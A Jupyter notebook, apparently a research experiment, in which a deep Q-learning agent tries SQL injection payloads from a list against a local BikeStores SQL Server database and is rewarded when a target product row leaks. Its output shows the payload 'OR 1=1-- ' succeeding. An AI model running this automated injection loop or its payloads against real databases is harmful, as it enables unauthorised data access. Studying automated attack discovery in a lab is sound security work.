**DATABASE CONFIGURATION**

In [32]:
from sqlalchemy.engine import URL
from sqlalchemy import create_engine
import numpy as np
import tensorflow as tf
from tensorflow import keras
from keras import layers
import pandas as pd
import numpy as np
import json
import sys

Load Configuration File

In [33]:
with open('config.json', 'r') as config_file:
    config = json.load(config_file)
    print(config)

{'database': {'name': 'BikeStores', 'server': '.\\SQLEXPRESS', 'driver': 'SQL Server', 'sample_query': 'SELECT * FROM production.brands'}, 'rl': {'state_info': {'mark_error': True, 'query_result_length': 100, 'padding_char': '\x00'}, 'contexts': [{'query': 'SELECT * FROM production.products WHERE brand_id=8 [INPUT]', 'table_filter': ['production.products'], 'column_filter': ['product_name'], 'goal': 'Trek 820 - 2016'}]}}


Set Up Connection to Microsoft SQL Database

In [34]:
db = config['database']

name = db['name']
server = db['server']
driver = db['driver']

# Connect to SQL database using the above parameters.
conn_string = f'DRIVER={driver};SERVER={server};DATABASE={name};Trusted_Connection=yes'
conn_url = URL.create('mssql+pyodbc', query={'odbc_connect': conn_string})
engine = create_engine(conn_url)

# Display a dataframe from a sample query if set.
if 'sample_query' in db:
    sample_query = db['sample_query']
    df = pd.read_sql(sample_query, engine)
    print(df)

   brand_id    brand_name
0         1       Electra
1         2          Haro
2         3        Heller
3         4   Pure Cycles
4         5       Ritchey
5         6       Strider
6         7  Sun Bicycles
7         8         Surly
8         9          Trek


**REINFORCEMENT LEARNING**

Define State Configuration

In [35]:
state_info_config = config['rl']['state_info']
mark_error = state_info_config['mark_error']
query_result_length = state_info_config['query_result_length']
padding_char = state_info_config['padding_char']
error_char = 'y'
no_error_char = 'n'

Define RL Contexts and Incrementation

In [36]:
# Not having any defined RL contexts will result in an error.
contexts = config['rl']['contexts']
context = contexts[0]
context_index = 0

# Increments RL context and returns whether another context was assigned.
def incr_context():
    global context, context_index
    if context_index < len(contexts) - 1:
        context_index += 1
        context = contexts[context_index]
        return True
    return False

Create SQL Injection Attack Functionality

In [37]:
# TODO: Remove non-MSSQL payloads.
payloads = open('sqli_payloads.txt', 'r').read().split('\n')

# Perfoms an SQL injection attack based on an index from the list of payloads.
def inject_payload(payload_index):
    # Finds [INPUT] within the context query configuration and replaces it with the payload.
    payload = payloads[payload_index]
    query = context['query']
    query = query.replace('[INPUT]', payload)

    reward = 0
    episode_over = False

    try:
        # Runs SQL injection query.
        df = pd.read_sql(query, engine)
        res = df.to_csv()

        # Check episode termination condition, and if true, apply appropriate reward.
        # TODO: Ensure tables are filtered as the same column name could exist in another table.
        for column in context['column_filter']:
            if column in df and context['goal'] in df[column].values:
                reward = 100
                episode_over = True

        has_error = no_error_char
    except:
        # Record error as a String.
        res = str(sys.exc_info()[1])
        has_error = error_char

    # Trim resulting string or pad it so that the length is equal to query_result_length.
    if len(res) > query_result_length:
        res = res[:query_result_length]
    else:
        res = res.ljust(query_result_length, padding_char)

    # Add error information if this is set.
    if mark_error:
        res = res + has_error

    return [ord(s) for s in res], reward, episode_over

DQN (Adapted from https://keras.io/examples/rl/deep_q_network_breakout/)

In [38]:
gamma = 0.99  # Discount factor for past rewards
epsilon = 1.0  # Epsilon greedy parameter
epsilon_min = 0.1  # Minimum epsilon greedy parameter
epsilon_max = 1.0  # Maximum epsilon greedy parameter
epsilon_interval = (
    epsilon_max - epsilon_min
)  # Rate at which to reduce chance of random action being taken
batch_size = 32  # Size of batch taken from replay buffer
max_steps_per_episode = 1000
max_running_reward = 5.0

num_actions = len(payloads)

# If a query result is an error, and if mark_error is true, this distinction will be added to the state information.
# TODO: Ensure mark_error information has a higher weighting in the neural net.
nn_input_size = query_result_length
if(mark_error):
    nn_input_size += 1

In [39]:
def create_q_model():
    # Network defined by the Deepmind paper
    inputs = layers.Input(shape=(1, nn_input_size))

    # Convolutions on the frames on the screen
    layer1 = layers.Conv1D(32, 1, strides=4, activation="relu")(inputs)
    layer2 = layers.Conv1D(64, 1, strides=2, activation="relu")(layer1)
    layer3 = layers.Conv1D(64, 1, strides=1, activation="relu")(layer2)

    layer4 = layers.Flatten()(layer3)

    layer5 = layers.Dense(512, activation="relu")(layer4)
    action = layers.Dense(num_actions, activation="linear")(layer5)

    return keras.Model(inputs=inputs, outputs=action)

# The first model makes the predictions for Q-values which are used to
# make an action.
model = create_q_model()
# Build a target model for the prediction of future rewards.
# The weights of a target model get updated every 10000 steps thus when the
# loss between the Q-values is calculated the target Q-value is stable.
model_target = create_q_model()

In [40]:
def create_init_state():
    state = padding_char * query_result_length
    if mark_error:
        state = state + no_error_char
    state = [ord(s) for s in state]
    return state

In [41]:
# In the Deepmind paper they use RMSProp however then Adam optimizer
# improves training time
optimizer = keras.optimizers.Adam(learning_rate=0.00025, clipnorm=1.0)

# Experience replay buffers
action_history = []
state_history = []
state_next_history = []
rewards_history = []
done_history = []
episode_reward_history = []
running_reward = 0
episode_count = 0
frame_count = 0
# Number of frames to take random action and observe output
epsilon_random_frames = 50
# Number of frames for exploration
epsilon_greedy_frames = 100.0
# Maximum replay length
# Note: The Deepmind paper suggests 1000000 however this causes memory issues
max_memory_length = 10
# Train the model after 4 actions
update_after_actions = 4
# How often to update the target network
update_target_network = 100
# Using huber loss for stability
loss_function = keras.losses.Huber()

terminating_actions = set()

while True:  # Run until solved
    state = create_init_state()
    episode_reward = 0

    for timestep in range(1, max_steps_per_episode):
        # env.render(); Adding this line would show the attempts
        # of the agent in a pop up window.
        frame_count += 1

        # Use epsilon-greedy for exploration
        if frame_count < epsilon_random_frames or epsilon > np.random.rand(1)[0]:
            # Take random action
            action = np.random.choice(num_actions)
        else:
            # Predict action Q-values
            # From environment state
            state = np.array(state).reshape(1, 1, nn_input_size)
            action_probs = model(state, training=False)
            # Take best action
            action = tf.argmax(action_probs[0]).numpy()

        # Decay probability of taking random action
        epsilon -= epsilon_interval / epsilon_greedy_frames
        epsilon = max(epsilon, epsilon_min)

        # Apply the sampled action in our environment
        state_next, reward, done = inject_payload(action)
        state_next = np.array(state_next)

        episode_reward += reward

        # Save actions and states in replay buffer
        action_history.append(action)
        state_history.append(state)
        state_next_history.append(state_next)
        done_history.append(done)
        rewards_history.append(reward)
        state = state_next

        # Update every fourth frame and once batch size is over 32
        if frame_count % update_after_actions == 0 and len(done_history) > batch_size:

            # Get indices of samples for replay buffers
            indices = np.random.choice(range(len(done_history)), size=batch_size)

            # Using list comprehension to sample from replay buffer
            state_sample = np.array([state_history[i] for i in indices])
            state_next_sample = np.array([state_next_history[i] for i in indices]).reshape(1, batch_size, 1, nn_input_size)
            rewards_sample = [rewards_history[i] for i in indices]
            action_sample = [action_history[i] for i in indices]
            done_sample = tf.convert_to_tensor(
                [float(done_history[i]) for i in indices]
            )

            # Build the updated Q-values for the sampled future states
            # Use the target model for stability
            future_rewards = model_target.predict(state_next_sample)
            # Q value = reward + discount factor * expected future reward
            updated_q_values = rewards_sample + gamma * tf.reduce_max(
                future_rewards, axis=1
            )

            # If final frame set the last value to -1
            updated_q_values = updated_q_values * (1 - done_sample) - done_sample

            # Create a mask so we only calculate loss on the updated Q-values
            masks = tf.one_hot(action_sample, num_actions)

            with tf.GradientTape() as tape:
                # Train the model on the states and updated Q-values
                q_values = model(state_sample)

                # Apply the masks to the Q-values to get the Q-value for action taken
                q_action = tf.reduce_sum(tf.multiply(q_values, masks), axis=1)
                # Calculate loss between new Q-value and old Q-value
                loss = loss_function(updated_q_values, q_action)

            # Backpropagation
            grads = tape.gradient(loss, model.trainable_variables)
            optimizer.apply_gradients(zip(grads, model.trainable_variables))

        if frame_count % update_target_network == 0:
            # update the the target network with new weights
            model_target.set_weights(model.get_weights())
            # Log details
            template = "running reward: {:.2f} at episode {}, frame count {}"
            print(template.format(running_reward, episode_count, frame_count))

        # Limit the state and reward history
        if len(rewards_history) > max_memory_length:
            del rewards_history[:1]
            del state_history[:1]
            del state_next_history[:1]
            del action_history[:1]
            del done_history[:1]

        if done:
            terminating_actions.add(action_history[len(action_history)-1])
            break

    # Update running reward to check condition for solving
    episode_reward_history.append(episode_reward)
    if len(episode_reward_history) > 100:
        del episode_reward_history[:1]
    running_reward = np.mean(episode_reward_history)

    episode_count += 1

    if running_reward > max_running_reward:  # Condition to consider the task solved
        print(f'Solved at episode {episode_count}!')
        break

Solved at episode 1!


In [42]:
print('Successful SQL injection payloads:', [payloads[a] for a in terminating_actions])

Successful SQL injection payloads: ['OR 1=1-- ']
